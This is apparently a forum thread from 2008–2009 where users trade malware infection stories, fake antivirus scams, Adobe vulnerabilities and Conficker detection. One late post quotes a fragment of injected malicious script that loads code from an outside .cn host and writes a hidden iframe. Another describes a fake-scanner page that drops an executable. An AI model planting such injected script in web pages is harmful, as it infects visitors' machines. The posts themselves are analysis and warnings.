|
GruntyThrst posted:I just got a good one. Typical "ATTN. WINDOWS MAY BE AT RISK CLICK HERE TO DOWNLAOD (sic) ANTI-VIRUS" popups. Atypical symptoms: whenever I run AdAware or Spybot the computer crashes to a BSOD talking about some "non registered anti-spyware" crap. I'm running a scan in safe mode now to see if that does anything. Another interesting thing, and I have no idea how it can do this, whenever I go to popular AV distributor like Norton or the AdAware/Spybot sites, even malwarebytes.org, I get redirected to some random search page like you see when a domain expires/is squatted. Also there's that lovely new desktop icon labeled "Gay Fetish Sex." can i see your hosts file please? ( ) e: A lot of virii do this just to prevent downloading of an AV or updates/etc?
|
# ¿ Dec 20, 2008 21:05 |
|
|
# ¿ Apr 26, 2024 06:54 |
|
GREAT BOOK OF DICK posted:They were 12 REGISTRY entries from atdmt.com, not cookies. Even after removing them it still loses network connectivity so I'm sure there's still something somewhere.
|
# ¿ Dec 23, 2008 09:15 |
|
BillWh0re posted:Looks like it has an autorun.inf file, probably hidden, from some Chinese autorun worm on there. Most likely it got infected after you plugged it in. You'll probably find the same file on the root of every other drive, including network shares writable from that computer that are mapped to a drive letter, though perhaps not the C: drive. Symantec probably detected and removed the executable but not the autorun.inf file itself which is what causes explorer to show that menu. CDs can autorun too.
|
# ¿ Dec 30, 2008 21:23 |
|
BillWh0re posted:They're read only which means they don't get infected the moment you stick them in an infected computer, which is what happens with USB sticks unless there happen to be some fancy ones that make themselves read only. CDRW? If it was burned along with the files (dunno if any malware does this kind of insertion) - it would still infect anyways.
|
# ¿ Dec 30, 2008 21:37 |
|
Hillridge posted:Same here, I got infected through a Java exploit before they patched it. The only way to be sure you never get anything is to unplug your network cable/kill wireless. flash drives, cd's, any kind of interface that lets you talk to anything else through anything The only way to be sure you never get anything is to not have a computer.
|
# ¿ Jan 3, 2009 16:55 |
|
Doc Faustus posted:I generally assume that anyone in SH/SC is a competent computer user, so do you guys have any idea what the vector was for your infection? Parents browsing pornography?
|
# ¿ Feb 19, 2009 21:35 |
|
Doc Faustus posted:I think this is almost always the case... I work University IT, and I still see AV 2009 or whatever again and again. I think my favorite story was "I was looking at a website about macs and got a virus." Is that virus HIV?
|
# ¿ Feb 20, 2009 00:38 |
|
quote:Several online websites such as Sophos identify this trojan as “Troj/ServU-FP” however this variant seems to have many differences. Here is what I have gathered so far… Dameware is usually used to keep ServU/iroffer running.
|
# ¿ Feb 20, 2009 18:33 |
|
Ranma4703 posted:I saw this twice yesterday, and I've never seen it before - did a google search for something mundane (I think it was BBQ Chicken Recipes and NYU Protest), and the second result I clicked on took me to a page that was supposed to look like it was scanning my computer, and a dialog popped up that said my computer had spyware on it. I didn't give it permission to do anything, and I closed the site immediately, but is there any way I already got a virus? I'm running Windows XP SP3, and Firefox 3.0.6. I have Dreamweaver installed, but I don't think I have the pdf viewer - I use Foxit. e: jesus christ, the thing does like 50 redirects. If your referrer isn't off a search engine, instead of redirecting you further, it'll document.write() a fake apache 404 page. Does some activex control poo poo, possibly an exploit, not sure: 6BF52A52-394A-11D3-B153-00C04F79FAA6 [jQuery1235412648121] ---- Does annoying poo poo like this, looks like a fake popup in-page (looks like it's using jquery.js, which is a compressed version, clean, of jquery): $(".file_scanner").html("Scan complete. 527 threats was found!"); ---- Attempts to download a file while playing a really annoying .wav repeatedly: [ebd@nexus ~]$ file download.php\?affid\=04802 download.php?affid=04802: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit Elected by Dogs fucked around with this message at 22:01 on Feb 23, 2009 |
# ¿ Feb 23, 2009 21:45 |
|
liquidXenon posted:Bonus points for Adobe: http://www.theregister.co.uk/2009/02/24/adobe_flash_vulnerability/ Bonus points for Adobe Photoshop pirates: 127.0.0.1 whatever.host.adobe.uses.for.everything oh my god i get virus
|
# ¿ Feb 25, 2009 02:22 |
|
Adobe Reader/Acrobat JBIG2 Stream Array Indexing Vulnerability Adobe is planning to release updates to Adobe Reader and Acrobat to resolve the relevant security issue. Adobe expects to make available an update for Adobe Reader 9 and Acrobat 9 by March 11th, 2009. Adobe is planning to make updates for Adobe Reader 7 and 8, and Acrobat 7 and 8, available by March 18th. March 11th, 2009. For something loving being actively exploited right now. Two, three weeks.
|
# ¿ Feb 27, 2009 04:04 |
|
Orange Juilius posted:http://vrt-sourcefire.blogspot.com/2009/02/homebrew-patch-for-adobe-acroreader-9.html I don't do IT for work (still a student) - I'm just shocked that something as exploitable (and being exploited already), Adobe already knows about it, the community already has ap atch, and they're just arsing around
|
# ¿ Feb 27, 2009 04:58 |
|
Midelne posted:I'd be pretty drat concerned about whether I got the whole thing if it's new enough that the scanner doesn't pick it up but sloppy enough that you can just wander in and delete it, even in safe mode. I'd be concerned that the scanner couldn't pick up something that simple...
|
# ¿ Feb 27, 2009 21:01 |
|
Doc Faustus posted:I'm concerned that people would run "ecard.exe". I think if I do find someone with that, I'm going to tell them I've got an extra computer that Dell delivered by accident, and it's a really nice one, but I'll give 'em a discount on it... Real life: gently caress off you're a scammer i'll kill you Internet: REALLY? THIS TALKING FLASHY XBOX CONSOLE WANTS TO REMORTGAGE MY HOUSE AND ENLARGE MY PENIS AND GIVE ME A TALKING PURPLE GORILLA? *hands over ssn, cc and runs .pif*
|
# ¿ Feb 27, 2009 23:31 |
|
John Dough posted:Yes, my high school used some sort of hardware device that would revert to a disk image on each reboot. This worked until people figured out the BIOS password deep freeze?
|
# ¿ Mar 2, 2009 14:39 |
|
Midelne posted:Start up IE and hello popups. Does IE autorestore tabs on re-execution?
|
# ¿ Mar 3, 2009 19:11 |
|
Cojawfee posted:What do you mean I'm not protected? Does that application try to force a fake XP-styled window or is your display settings for titlebar actually bold verdana 10(?)?
|
# ¿ Mar 9, 2009 19:49 |
|
Wait, why is an office network using DHCP and getting DNS servers dynamically?
|
# ¿ Mar 9, 2009 22:50 |
|
Ensign Expendable posted:I thought Java only had vulnerabilities in the early JVMs. You could always get them to run Firefox with NoScript or similar, unless your corporate policy prohibits it for some reason. why isnt my facebook working its not popping up that cute little window with the gradiented gray borders in the page OH I SEE ALLOW SCRIPTS GLOBALLY
|
# ¿ Mar 19, 2009 03:41 |
|
Cute, theres a worm/virus with mipsel shellcode and bruteforcing ddwrt/etc routers.
|
# ¿ Mar 24, 2009 20:08 |
|
GREAT BOOK OF DICK posted:For those who don't know what that's about see this link. Anyone who set up a home router with these firmwares and configured it in this lovely way should be aware. They should also learn how to secure their poo poo. Anyone smart enough to set ddwrt up shouldn't be that retarded. Though.. don't some small ISPs hand out like, custom gw/switch/routers for DSL or something that run ddw?
|
# ¿ Mar 25, 2009 13:00 |
|
Conficker's detectable by nmap btw - nmap -PN -d -p 445 --script=smb-check-vulns --script-args=safe=1 1.2.3.4
|
# ¿ Mar 31, 2009 13:38 |
|
BorderPatrol posted:This site has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds. This web site at https://www.rjlsoftware.com has been reported as an attack site and has been blocked based on your security preferences. <script type="text/javascript" src=http://avse2.cn> var ff=new ActiveXObject(flash);} catch(b){}; finally{if(b!="[object Error]"){document.write("<iframe width=111 height=111 src=f.html></iframe>");}} Jesus christ this thing has like 300 .js iframes in iframes all obfuscated
|
# ¿ Sep 17, 2009 05:58 |
|
|
# ¿ Apr 26, 2024 06:54 |
|
BorderPatrol posted:Hmm, I got that message but I looked through the source code and didn't see anything odd. I figured it was because the programs themselves are usually trapped up in antivirus programs. It's at the bottom right below the Google Analytics code before </body>
|
# ¿ Sep 17, 2009 21:37 |